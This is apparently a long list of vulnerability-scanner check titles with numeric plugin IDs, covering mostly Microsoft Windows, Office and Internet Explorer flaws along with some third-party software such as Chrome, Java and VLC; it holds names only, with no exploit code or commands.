Microsoft Windows Media Could Allow Remote Code Execution Vulnerabilities (2636391) [902784] Microsoft Windows Object Packager Remote Code Execution Vulnerability (2603381) [902783] Microsoft Windows Kernel Security Feature Bypass Vulnerability (2644615) [902782] MicroSoft Windows Server Service Remote Code Execution Vulnerability (921883) [902766] Microsoft Windows Kernel Privilege Elevation Vulnerability (2633171) [902694] Microsoft Windows IIS FTP Service Information Disclosure Vulnerability (2761226) [902693] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2761226) [902687] Microsoft Windows Data Access Components Remote Code Execution Vulnerability (2698365) [902677] Microsoft Windows Prtition Manager Privilege Elevation Vulnerability (2690533) [902676] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (2688338) [902609] Microsoft Windows CSRSS Privilege Escalation Vulnerabilities (2507938) [902598] Microsoft Windows Time Component Remote Code Execution Vulnerability (2618451) [902597] Microsoft Windows Media Remote Code Execution Vulnerability (2648048) [902596] Microsoft Windows OLE Remote Code Execution Vulnerability (2624667) [902588] Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability [902566] Microsoft Windows WINS Local Privilege Escalation Vulnerability (2571621) [902516] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902484] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (2588516) [902463] Microsoft Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2567680) [902440] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2536275) [902425] Microsoft Windows SMB Accessible Shares [902403] Microsoft Windows Fraudulent Digital Certificates Spoofing Vulnerability [902377] Microsoft Windows OLE Automation Remote Code Execution Vulnerability (2476490) [902337] Microsoft Windows Kernel Elevation of Privilege Vulnerability (2393802) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [902289] Microsoft Windows LSASS Privilege Escalation Vulnerability (2478960) [902281] Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910) [902280] Microsoft Windows BranchCache Remote Code Execution Vulnerability (2385678) [902277] Microsoft Windows Netlogon Service Denial of Service Vulnerability (2207559) [902276] Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420) [902269] Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468) [902263] Microsoft Windows Media Player Network Sharing Remote Code Execution Vulnerability (2281679) [902262] Microsoft Windows Shell and WordPad COM Validation Vulnerability (2405882) [902256] Microsoft Windows win32k.sys Driver 'CreateDIBPalette()' BOF Vulnerability [902232] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (978886) [902231] Microsoft Windows Tracing Feature Privilege Elevation Vulnerabilities (982799) [902227] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [902226] Microsoft Windows Shell Remote Code Execution Vulnerability (2286198) [902094] Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) [902093] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (981852) [902067] Microsoft Windows Kernel Mode Drivers Privilege Escalation Vulnerabilities (979559) [902033] Microsoft Windows '.ani' file Denial of Service vulnerability [901305] Microsoft Windows IP-HTTPS Component Security Feature Bypass Vulnerability (2765809) [901304] Microsoft Windows File Handling Component Remote Code Execution Vulnerability (2758857) [901301] Microsoft Windows Kerberos Denial of Service Vulnerability (2743555) [901212] Microsoft Windows DirectPlay Remote Code Execution Vulnerability (2770660) [901211] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2720573) [901209] Microsoft Windows Media Center Remote Code Execution Vulnerabilities (2604926) [901205] Microsoft Windows Components Remote Code Execution Vulnerabilities (2570947) [901193] Microsoft Windows Media Remote Code Execution Vulnerabilities (2510030) [901169] Microsoft Windows Address Book Remote Code Execution Vulnerability (2423089) [901164] Microsoft Windows SChannel Denial of Service Vulnerability (2207566) [901163] Microsoft Windows Media Player Remote Code Execution Vulnerability (2378111)) [901150] Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability(2347290) [901140] Microsoft Windows SMB Code Execution and DoS Vulnerabilities (982214) [901119] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (980218) [901102] Microsoft Windows Media Services Remote Code Execution Vulnerability (980858) [901065] Microsoft Windows IAS Remote Code Execution Vulnerability (974318) [901064] Microsoft Windows ADFS Remote Code Execution Vulnerability (971726) [901063] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [901012] Microsoft Windows Media Format Remote Code Execution Vulnerability (973812) [900965] Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability [900963] Microsoft Windows Kernel Privilege Escalation Vulnerability (971486) [900957] Microsoft Windows Patterns & Practices EntLib DOS Vulnerability [900956] Microsoft Windows Patterns & Practices EntLib Version Detection [900908] Microsoft Windows Message Queuing Privilege Escalation Vulnerability (971032) [900907] Microsoft Windows AVI Media File Parsing Vulnerabilities (971557) [900886] Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (969947) [900881] Microsoft Windows Indexing Service ActiveX Vulnerability (969059) [900880] Microsoft Windows ATL COM Initialization Code Execution Vulnerability (973525) [900879] Microsoft Windows Media Player ASF Heap Overflow Vulnerability (974112) [900877] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [900876] Microsoft Windows CryptoAPI X.509 Spoofing Vulnerabilities (974571) [900873] Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness (971888) [900838] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (967723) [900814] Microsoft Windows WINS Remote Code Execution Vulnerability (969883) [900757] Microsoft Windows Media Player '.AVI' File DOS Vulnerability [900740] Microsoft Windows Kernel Could Allow Elevation of Privilege (977165) [900568] Microsoft Windows Search Script Execution Vulnerability (963093) [900465] Microsoft Windows DNS Memory Corruption Vulnerability - Mar09 [900404] Microsoft Windows RTCP Unspecified Remote DoS Vulnerability [900336] Microsoft Windows Media Player MID File Integer Overflow Vulnerability [900297] Microsoft Windows Kernel Denial of Service Vulnerability (2556532) [900296] Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) [900295] Microsoft Windows DNS Server Remote Code Execution Vulnerability (2562485) [900281] Microsoft IE Developer Tools WMITools and Windows Messenger ActiveX Control Vulnerability (2508272) [900280] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2508429) [900266] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (2424434) [900263] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (2296199) [900248] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (981997) [900241] Microsoft Outlook Express and Windows Mail Remote Code Execution Vulnerability (978542) [900240] Microsoft Exchange and Windows SMTP Service Denial of Service Vulnerability (981832) [900237] Microsoft Windows Authentication Verification Remote Code Execution Vulnerability (981210) [900236] Microsoft Windows Kernel Could Allow Elevation of Privilege (979683) [900235] Microsoft Windows Media Player Could Allow Remote Code Execution (979402) [900232] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561) [900230] Microsoft Windows SMB Server Multiple Vulnerabilities (971468) [900227] Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) [900178] Microsoft Windows 'UnhookWindowsHookEx' Local DoS Vulnerability [900173] Microsoft Windows Media Player Version Detection [900172] Microsoft Windows Media Player 'MIDI' or 'DAT' File DoS Vulnerability [900108] Microsoft Windows NSlookup.exe Remote Code Execution Vulnerability [803007] Microsoft Windows Minimum Certificate Key Length Spoofing Vulnerability (2661254) [802888] Microsoft Windows Media Service Handshake Sequence DoS Vulnerability [802677] CA ARCserve Backup RPC Services Multiple Vulnerabilities (Windows) [802634] Microsoft Windows Unauthorized Digital Certificates Spoofing Vulnerability (2718704) [802500] Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability [802426] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2647518) [802383] Microsoft Windows Color Control Panel Privilege Escalation Vulnerability [802379] Microsoft Windows Kernel 'win32k.sys' Memory Corruption Vulnerability [802260] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [802140] Microsoft Explorer HTTPS Sessions Multiple Vulnerabilities (Windows) [802136] Microsoft Windows Insecure Library Loading Vulnerability (2269637) [801991] Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability [801966] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937) [801914] Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability [801719] Microsoft Windows CSRSS CSRFinalizeContext Local Privilege Escalation Vulnerability (930178) [801718] Microsoft Windows Vista Information Disclosure Vulnerability (931213) [801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [801716] Microsoft Outlook Express/Windows Mail MHTML URI Handler Information Disclosure Vulnerability (929123) [801713] Microsoft Outlook Express And Windows Mail NNTP Protocol Heap Buffer Overflow Vulnerability (941202) [801706] Microsoft Windows TCP/IP Remote Code Execution Vulnerabilities (941644) [801705] Microsoft Windows TCP/IP Denial of Service Vulnerability (946456) [801701] Microsoft Windows DNS Client Service Response Spoofing Vulnerability (945553) [801669] Microsoft Windows IIS FTP Server DOS Vulnerability [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability [801580] Microsoft Windows Fax Cover Page Editor BOF Vulnerabilities [801527] Microsoft Windows 32-bit Platforms Unspecified vulnerabilities [801487] Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693) [801486] Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability (950760) [801484] Microsoft Windows IPsec Policy Processing Information Disclosure Vulnerability (953733) [801483] Microsoft Windows Search Remote Code Execution Vulnerability (959349) [801482] Microsoft Windows ASP.NET Denial of Service Vulnerability(970957) [801479] Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145) [801457] Microsoft Windows Address Book Insecure Library Loading Vulnerability [801456] Microsoft Windows Progman Group Converter Insecure Library Loading Vulnerability [801333] Microsoft Windows Kernel 'win32k.sys' Multiple DOS Vulnerabilities [801090] Microsoft Windows Indeo Codec Multiple Vulnerabilities [800862] Microsoft Windows Kernel win32k.sys Privilege Escalation Vulnerability [800687] Microsoft Windows Server 2003 OpenType Font Engine DoS Vulnerability [800577] Microsoft Windows Server 2003 win32k.sys DoS Vulnerability [800504] Microsoft Windows XP SP3 denial of service vulnerability [800480] Microsoft Windows Media Player '.mpg' Buffer Overflow Vulnerability [800466] Microsoft Windows TLS/SSL Spoofing Vulnerability (977377) [800442] Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability [800332] Microsoft Windows Live Messenger Information Disclosure Vulnerability [800331] Microsoft Windows Live Messenger Client Version Detection [800328] Integer Overflow vulnerability in Microsoft Windows Media Player [800310] Microsoft Windows Media Services nskey.dll ActiveX BOF Vulnerability [800023] Microsoft Windows Image Color Management System Code Execution Vulnerability (952954) [102059] Microsoft Windows Vector Markup Language Buffer Overflow (938127) [102055] Microsoft Windows GDI Multiple Vulnerabilities (925902) [102053] Microsoft Windows Vector Markup Language Vulnerabilities (929969) [102015] Microsoft RPC Interface Buffer Overrun (KB824146) [100624] Microsoft Windows SMTP Server DNS spoofing vulnerability [100596] Microsoft Windows SMTP Server MX Record Denial of Service Vulnerability [100283] Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability [90024] Windows Vulnerability in Microsoft Jet Database Engine [11808] Microsoft RPC Interface Buffer Overrun (823980) [903037] Microsoft JScript and VBScript Engines Remote Code Execution Vulnerability (2706045) [903030] Google Chrome Multiple Vulnerabilities(02) - May 12 (Windows) [903029] Apple Safari Multiple Vulnerabilities - Oct 2011 (Windows) [903026] Microsoft Office Remote Code Execution Vulnerabilities (2663830) [903017] Microsoft Office Remote Code Execution Vulnerability (2639185) [903014] Adobe Flash Player/Air Code Execution and DoS Vulnerabilities (Windows) [903007] Google Chrome Full Sandbox Escape and Code Execution Vulnerability (Windows) [903004] Google Chrome Multiple Vulnerabilities (Windows) - Mar 12 [903003] GOM Media Player 'Open URL' Feature Unspecified Vulnerability (Windows) [903002] GOM Media Player 'AVI' File Unspecified Vulnerability (Windows) [903000] Microsoft Expression Design Remote Code Execution Vulnerability (2651018) [902934] Microsoft .NET Framework Remote Code Execution Vulnerability (2745030) [902932] Microsoft Internet Explorer Multiple Use-After-Free Vulnerabilities (2761451) [902931] Microsoft Office Remote Code Execution Vulnerabilities - 2720184 (Mac OS X) [902930] Microsoft Office Remote Code Execution Vulnerabilities (2720184) [902923] Microsoft Internet Explorer Multiple Vulnerabilities (2722913) [902922] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2723135) [902921] Microsoft Office Visio/Viewer Remote Code Execution Vulnerability (2733918) [902920] Microsoft Office Remote Code Execution Vulnerability (2731879) [902919] Microsoft SharePoint Privilege Elevation Vulnerabilities (2663841) [902917] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2709162) [902914] Microsoft IIS GET Request Denial of Service Vulnerability [902913] Microsoft Office Remote Code Execution Vulnerabilities-2663830 (Mac OS X) [902912] Microsoft Office Word Remote Code Execution Vulnerability-2680352 (Mac OS X) [902911] Microsoft Office Word Remote Code Execution Vulnerability (2680352) [902910] Microsoft Office Visio Viewer Remote Code Execution Vulnerability (2597981) [902907] Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2641653) [902903] Google Chrome Multiple Vulnerabilities - Jan12 (Windows) [902842] Microsoft Lync Remote Code Execution Vulnerabilities (2707956) [902841] Microsoft .NET Framework Remote Code Execution Vulnerability (2706726) [902839] Microsoft FrontPage Server Extensions MS-DOS Device Name DoS Vulnerability [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows) [902836] PHP 'com_print_typeinfo()' Remote Code Execution Vulnerability (Windows) [902833] Microsoft .NET Framework Remote Code Execution Vulnerability (2693777) [902832] MS Security Update For Microsoft Office, .NET Framework, and Silverlight (2681578) [902828] Microsoft .NET Framework Remote Code Execution Vulnerability (2671605) [902818] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902817] Microsoft Visual Studio Privilege Elevation Vulnerability (2651019) [902811] Microsoft .NET Framework and Microsoft Silverlight Remote Code Execution Vulnerabilities (2651026) [902810] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2660465) [902808] IBM Lotus Symphony Image Object Integer Overflow Vulnerability (Windows) [902798] Microsoft SMB Signing Enabled and Not Required At Server [902797] Microsoft SMB Signing Information Disclosure Vulnerability [902796] Microsoft IIS IP Address/Internal Network Name Disclosure Vulnerability [902792] MS Windows Indeo Codec Remote Code Execution Vulnerability (2661637) [902791] MS Windows Color Control Panel Remote Code Execution Vulnerability (2643719) [902786] Oracle VM VirtualBox Multiple Unspecified Vulnerabilities (Windows) [902785] Microsoft AntiXSS Library Information Disclosure Vulnerability (2607664) [902781] Windows Media Player Denial Of Service Vulnerability [902775] Mozilla Products Multiple Vulnerabilities - Dec 11 (Windows) [902774] Mozilla Products DOMAttrModified Memory Corruption Vulnerability (Windows) [902770] FFFTP Untrusted Search Path Vulnerability (Windows) - Dec 11 [902768] MS Windows Active Directory Remote Code Execution Vulnerability (2640045) [902767] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902765] Adobe Flex SDK 'SWF' Files Cross-Site Scripting Vulnerability (Windows) [902760] ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows) [902746] Microsoft Active Accessibility Remote Code Execution Vulnerability (2623699) [902738] Adobe Flash Player Multiple Vulnerabilities September-2011 (Windows) [902727] Microsoft Office Excel Remote Code Execution Vulnerabilities (2587505) [902725] Nfs-utils rpc.statd Multiple Remote Format String Vulnerabilities [902709] Adobe Air and Flash Player Multiple Vulnerabilities August-2011 (Windows) [902708] Microsoft Remote Desktop Protocol Denial of Service Vulnerability (2570222) [902705] VLC Media Player '.AVI' File BOF Vulnerability (Windows) [902704] VLC Media Player '.RM' File BOF Vulnerability (Windows) [902696] Microsoft Internet Explorer Multiple Vulnerabilities (2761465) [902692] Microsoft Office Excel ReadAV Arbitrary Code Execution Vulnerability [902689] Microsoft SQL Server Report Manager Cross Site Scripting Vulnerability (2754849) [902688] Microsoft System Center Configuration Manager XSS Vulnerability (2741528) [902686] Microsoft Internet Explorer Multiple Vulnerabilities (2719177) [902683] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2685939) [902682] Microsoft Internet Explorer Multiple Vulnerabilities (2699988) [902679] Google SketchUp '.SKP' File Remote Code Execution Vulnerability (Windows) [902678] Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X) [902670] Microsoft Internet Explorer Multiple Vulnerabilities (2675157) [902669] Windows Authenticode Signature Remote Code Execution Vulnerability (2653956) [902666] Opera Multiple Vulnerabilities - March12 (Windows) [902663] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902662] MicroSoft SMB Server Trans2 Request Remote Code Execution Vulnerability [902660] Microsoft SMB Transaction Parsing Remote Code Execution Vulnerability [902658] Microsoft RDP Server Private Key Information Disclosure Vulnerability [902657] Windows ClickOnce Application Installer Remote Code Execution Vulnerability (2584146) [902653] MS Windows C Run-Time Library Remote Code Execution Vulnerability (2654428) [902649] Microsoft Internet Explorer Multiple Vulnerabilities (2647516) [902645] Google Chrome Multiple Vulnerabilities - December11 (Windows) [902643] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2620712) [902642] Microsoft Internet Explorer Multiple Vulnerabilities (2618444) [902638] Apple iTunes Remote Code Execution Vulnerability (Windows) [902635] Google Chrome V8 Remote Code Execution Vulnerability (Windows) [902626] Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048) [902625] Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858) [902614] Google Chrome Secure Cookie Security Bypass Vulnerability (Windows) [902613] Microsoft Internet Explorer Multiple Vulnerabilities (2559049) [902603] VLC Media Player XSPF Playlist Integer Overflow Vulnerability (Windows) [902581] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2604930) [902580] Microsoft Host Integration Server Denial of Service Vulnerabilities (2607670) [902567] Microsoft Office Remote Code Execution Vulnerabilites (2587634) [902561] McAfee SaaS Endpoint Protection Version Detection (Windows) [902552] Microsoft .NET Framework Chart Control Information Disclosure Vulnerability (2567943) [902551] Microsoft .NET Framework Information Disclosure Vulnerability (2567951) [902549] Oracle VM VirtualBox Unspecified Vulnerability (Windows) [902546] IBM Informix Dynamic Server Oninit Remote Code Execution Vulnerability (Windows) [902545] IBM Informix Dynamic Server Version Detection (Windows) [902538] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2555917) [902529] ejabberd Version Detection (Windows) [902527] ejabberd XML Parsing Denial of Service Vulnerability (Windows) [902525] Oracle Java SE Multiple Unspecified Vulnerabilities 01 - June11 (Windows) [902524] Oracle Java SE Multiple Unspecified Vulnerabilities - June11 (Windows) [902523] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2514842) [902522] Microsoft .NET Framework Remote Code Execution Vulnerability (2538814) [902518] Microsoft .NET Framework Security Bypass Vulnerability [902502] Microsoft .NET Framework Remote Code Execution Vulnerability (2484015) [902501] Microsoft JScript and VBScript Scripting Engines Remote Code Execution Vulnerability (2514666) [902499] MS Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2646524) [902496] Microsoft Office IME (Chinese) Privilege Elevation Vulnerability (2652016) [902495] Microsoft Office Remote Code Execution Vulnerability (2590602) [902494] Microsoft Office Excel Remote Code Execution Vulnerability (2640241) [902493] Microsoft Publisher Remote Code Execution Vulnerabilities (2607702) [902492] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2639142) [902486] Windows Mail and Windows Meeting Space Remote Code Execution Vulnerability (2620704) [902485] Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2617657) [902483] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902482] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability (2592799) [902477] CDE ToolTalk RPC Database Server Multiple Vulnerabilities [902464] Microsoft Visio Remote Code Execution Vulnerabilities (2560978) [902462] CA ARCserver D2D GWT RPC Request Multiple Vulnerabilities [902455] Microsoft Visio Remote Code Execution Vulnerability (2560847) [902445] Microsoft XML Editor Information Disclosure Vulnerability (2543893) [902444] MS Windows Threat Management Gateway Firewall Client Remote Code Execution Vulnerability (2520426 [902443] Microsoft Internet Explorer Multiple Vulnerabilities (2530548) [902442] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability [902441] Windows MHTML Information Disclosure Vulnerability (2544893) [902430] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2545814) [902424] MS Windows Ancillary Function Driver Privilege Elevation Vulnerabilities (2645640) [902423] Microsoft Office Visio Viewer Remote Code Execution Vulnerabilities (2663510) [902411] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2489283) [902410] Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279) [902409] Windows MHTML Information Disclosure Vulnerability (2503658) [902408] Windows Fax Cover Page Editor Remote Code Execution Vulnerability (2527308) [902400] Adobe Products Remote Memory Corruption Vulnerability (Windows) [902399] LibreOffice LWP File Processing Multiple Buffer Overflow Vulnerabilities (Windows) [902398] LibreOffice Version Detection (Windows) [902395] Microsoft Bluetooth Stack Remote Code Execution Vulnerability (2566220) [902392] Google Chrome Multiple Vulnerabilities (Windows) - June 11 [902387] Adobe Reader/Acrobat Security Bypass Vulnerability (Windows) [902382] Google Chrome Multiple Vulnerabilities May11 (Windows) [902379] Adobe Reader/Acrobat Memory Corruption Vulnerability (Windows) [902378] Microsoft Office Excel Remote Code Execution Vulnerabilities (2537146) [902373] Adobe Audition '.ses' Multiple Buffer Overflow Vulnerabilities (Windows) [902365] Microsoft GDI+ Remote Code Execution Vulnerability (2489979) [902364] Microsoft Office Remote Code Execution Vulnerabilites (2489293) [902363] Windows OpenType Compact Font Format (CFF) Driver Remote Code Execution Vulnerability (2507618) [902353] Oracle Java SE Code Execution Vulnerabilities (Windows) [902351] Microsoft Groove Remote Code Execution Vulnerability (2494047) [902350] Oracle Java SE Code Execution Vulnerability (Windows-01) [902349] Oracle Java SE Code Execution Vulnerability (Windows) [902347] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902344] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902341] VLC Media Player USF and Text Subtitles Decoders BOF Vulnerabilities (Windows) [902340] VLC Media Player '.mkv' Code Execution Vulnerability (Windows) [902336] Microsoft JScript and VBScript Scripting Engines Information Disclosure Vulnerability (2475792) [902334] Vulnerability in Windows Shell Graphics Processing Could Allow Remote Code Execution (2483185) [902333] Tor Unspecified Heap Based Buffer Overflow Vulnerability (Windows) [902325] Microsoft Internet Explorer 'CSS Import Rule' Use-after-free Vulnerability [902324] Microsoft SharePoint Could Allow Remote Code Execution Vulnerability (2455005) [902323] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (981957) [902322] Windows Local Procedure Call Privilege Elevation Vulnerability (2360937) [902319] Microsoft Foundation Classes Could Allow Remote Code Execution Vulnerability (2387149) [902306] Mozilla Products 'js_InitRandom' Information Disclosure Vulnerability (Windows) [902305] Mozilla Firefox Information Disclosure Vulnerability (Windows) [902303] Adobe Products Content Code Execution Vulnerability (Windows) [902301] Windows Client/Server Runtime Subsystem Privilege Elevation Vulnerability (2121546) [902293] Metasploit Framework Version Detection (Windows) [902288] Microsoft Kerberos Privilege Escalation Vulnerabilities (2496930) [902287] Microsoft Visio Remote Code Execution Vulnerabilities (2451879) [902285] Microsoft Internet Explorer Information Disclosure Vulnerability (2501696) [902278] MS Windows ICSW Remote Code Execution Vulnerability (2443105) [902275] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2436673) [902274] Microsoft Publisher Remote Code Execution Vulnerability (2292970) [902265] Microsoft Office Word Remote Code Execution Vulnerabilities (2293194) [902264] Microsoft Office Excel Remote Code Execution Vulnerabilities (2293211) [902255] Microsoft Visual Studio Insecure Library Loading Vulnerability [902254] Microsoft Office Products Insecure Library Loading Vulnerability [902250] Microsoft Word 2003 'MSO.dll' Null Pointer Dereference Vulnerability [902246] Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability [902243] Microsoft Outlook TNEF Remote Code Execution Vulnerability (2315011) [902242] Mozilla Products Insecure Library Loading Vulnerability (Windows) [902239] Wireshark File Opening Insecure Library Loading Vulnerability (Windows) [902238] Skype Insecure Library Loading Vulnerability (Windows) [902230] Microsoft .NET Common Language Runtime Remote Code Execution Vulnerability (2265906) [902229] Microsoft Window MPEG Layer-3 Remote Code Execution Vulnerability (2115168) [902228] Microsoft Office Word Remote Code Execution Vulnerabilities (2269638) [902217] Microsoft Outlook SMB Attachment Remote Code Execution Vulnerability (978212) [902210] Microsoft IE cross-domain IFRAME gadgets keystrokes steal Vulnerability [902204] Mozilla Products Multiple Vulnerabilities june-10 (Windows) [902203] Opera Browser Multiple Vulnerabilities (Windows) [902197] Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows) [902196] Wireshark SMB dissector Denial of Service Vulnerability (Windows) [902195] Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows) [902193] Microsoft .NET Framework XML HMAC Truncation Vulnerability (981343) [902192] Microsoft Office COM Validation Remote Code Execution Vulnerability (983235) [902191] Microsoft Internet Explorer Multiple Vulnerabilities (982381) [902186] Mozilla Firefox Multiple Denial Of Service vulnerabilities (Windows) [902185] Mozilla Products 'IFRAME' Denial Of Service vulnerability (Windows) [902183] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability [902182] Opera Browser Multiple Denial Of Service Vulnerability (Windows) [902178] Microsoft Visual Basic Remote Code Execution Vulnerability (978213) [902176] Microsoft SharePoint '_layouts/help.aspx' Cross Site Scripting Vulnerability [902167] Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows) [902166] Microsoft Internet Explorer 'neutering' Mechanism XSS Vulnerability [902161] Adobe Acrobat and Reader PDF Handling Multiple Vulnerabilities (Windows) [902159] Microsoft VBScript Scripting Engine Remote Code Execution Vulnerability (980232) [902158] Microsoft Office Publisher Remote Code Execution Vulnerability (981160) [902157] Microsoft 'ISATAP' Component Spoofing Vulnerability (978338) [902156] Microsoft SMB Client Remote Code Execution Vulnerabilities (980232) [902155] Microsoft Internet Explorer Multiple Vulnerabilities (980182) [902151] Microsoft Internet Explorer Denial of Service Vulnerability - Mar10 [902149] Mozilla Products Multiple Vulnerabilities Mar-10 (Windows) [902147] Mozilla Firefox Unspecified Vulnerability Mar-10 (Windows) [902133] Microsoft Office Excel Multiple Vulnerabilities (980150) [902130] Mozilla Products Multiple Vulnerabilities feb-10 (Windows) [902128] Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows) [902120] Google Chrome Multiple Vulnerabilities - (Windows) [902117] Microsoft DirectShow Remote Code Execution Vulnerability (977935) [902116] Microsoft Client/Server Run-time Subsystem Privilege Elevation Vulnerability (978037) [902115] Microsoft Kerberos Denial of Service Vulnerability (977290) [902114] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (975416) [902112] Microsoft SMB Client Remote Code Execution Vulnerabilities (978251) [902098] Novell iPrint Client Multiple Vulnerabilities (windows) [902095] Microsoft Office Excel Remote Code Execution Vulnerability (2269707) [902080] Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593) [902075] XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows) [902073] Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10 [902069] Microsoft SharePoint Privilege Elevation Vulnerabilities (2028554) [902068] Microsoft Office Excel Remote Code Execution Vulnerabilities (2027452) [902060] Cybozu Office Authentication Bypass Vulnerability (Windows) [902045] aMSN session hijack vulnerability (Windows) [902044] aMSN Version Detection (Windows) [902039] Microsoft Visio Remote Code Execution Vulnerabilities (980094) [902038] Microsoft MPEG Layer-3 Codecs Remote Code Execution Vulnerability (977816) [902027] Mozilla Firefox Unspecified Vulnerability (Windows) [902015] Microsoft Paint Remote Code Execution Vulnerability (978706) [901210] Microsoft Office Privilege Elevation Vulnerability - 2721015 (Mac OS X) [901208] Microsoft Internet Explorer Multiple Vulnerabilities (2586448) [901206] Check RPC rstatd Service Running [901197] Google Chrome multiple vulnerabilities - March 11 (Windows) [901190] Google Chrome Use-After-Free Vulnerability (Windows) [901182] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2479628) [901181] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2476687) [901180] Microsoft Internet Explorer Multiple Vulnerabilities (2482017) [901174] OpenSC Version Detection (Windows) [901173] Windows Backup Manager Remote Code Execution Vulnerability (2478935) [901166] Microsoft Office Remote Code Execution Vulnerabilites (2423930) [901165] Windows Common Control Library Remote Code Execution Vulnerability (2296011) [901162] Microsoft Internet Explorer Multiple Vulnerabilities (2360131) [901161] Microsoft ASP.NET Information Disclosure Vulnerability (2418042) [901153] Google Chrome multiple vulnerabilities Sep-10 (Windows) [901151] Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960) [901145] FreeType Unspecified Vulnerability (Windows) [901144] FreeType Version Detection (Windows) [901143] FreeType Memory Corruption and Buffer Overflow Vulnerabilities (Windows) [901142] FreeType Multiple denial of service vulnerabilities (Windows) [901139] Microsoft Internet Explorer Multiple Vulnerabilities (2183461) [901120] Microsoft IIS Authentication Remote Code Execution Vulnerability (982666) [901097] Microsoft Internet Explorer Multiple Vulnerabilities (978207) [901095] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (972270) [901082] IBM DB2 UDB Multiple Unspecified Vulnerabilities (Windows) [901069] Microsoft Office Project Remote Code Execution 